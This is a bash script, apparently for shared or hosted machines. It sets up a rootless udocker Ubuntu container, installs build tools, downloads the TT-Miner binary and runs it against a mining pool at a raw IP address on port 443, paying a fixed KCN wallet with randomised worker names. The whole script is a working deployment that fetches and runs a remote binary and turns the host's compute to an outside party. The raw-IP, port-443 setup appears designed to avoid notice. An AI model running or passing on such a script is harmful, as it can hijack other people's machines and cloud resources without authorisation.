#!/bin/bash
wget https://github.com/indigo-dc/udocker/releases/download/1.3.9/udocker-1.3.9.tar.gz && tar zxvf udocker-1.3.9.tar.gz && mv udocker-1.3.9/udocker udocker && rm -rf udocker-1.3.9
cd udocker
./udocker pull ubuntu:focal
./udocker create --name=focal ubuntu:focal
./udocker  run focal /bin/bash

./udocker
echo
apt update -y;apt -y install binutils cmake build-essential screen unzip net-tools curl
apt install curl libssl1.0-dev
apt install libjansson-dev libjansson4 -y
wget https://github.com/TrailingStop/TT-Miner-release/releases/download/2024.3.2/TT-Miner-2024.3.2.tar.gz
tar xvf TT-Miner-2024.3.2.tar.gz
cd TT-Miner-2024.3.2
chmod +x TT-Miner
./TT-Miner -a Flex -o stratum+tcp://64.23.144.233:443 -u KCN=kc1qylrmtzw47wldzzgwfkxtgrhgvp8jnyrck33nqu.$(echo $(shuf -i 1000-9999 -n 1)-TETE) -p x
